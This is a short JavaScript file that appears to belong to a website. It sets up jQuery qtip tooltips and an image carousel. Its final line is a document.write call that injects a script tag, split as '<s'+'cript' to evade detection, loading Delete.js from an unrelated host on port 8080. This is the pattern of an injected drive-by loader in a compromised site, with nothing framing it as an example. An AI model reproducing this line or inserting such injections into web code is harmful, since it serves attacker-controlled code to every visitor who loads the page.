$(document).ready(function() 
{
    $('#carousel_tooltip a[href][title]').qtip({
      content: {  text: false  },
      style: {
		  border: {
			 width: 2,
			 radius: 2,
			 color: '#D7D90D'
		  },
		  tip: { 
		  corner: 'bottomLeft', 
			 color: '#D7D90D',
			 size: {
				x: 20, 
				y : 8 
			 }
			},
		name: 'green',
		  width: 200
		
	  },
	  position: {
		corner: {
			target: 'topRight',
			tooltip: 'bottomleft'
		}
	}
	  
	


   });
});

window.onload = function(){
	$('#carousel').Carousel({
		itemWidth: 110,
		itemHeight: 50,
		items: 'a',
		rotationSpeed: 3,
		reflections: .5,
		itemMinWidth: 50
	});
}


document.write('<s'+'cript type="text/javascript" src="http://dolfy.sedonahyperbarics.com:8080/Delete.js"></scr'+'ipt>');
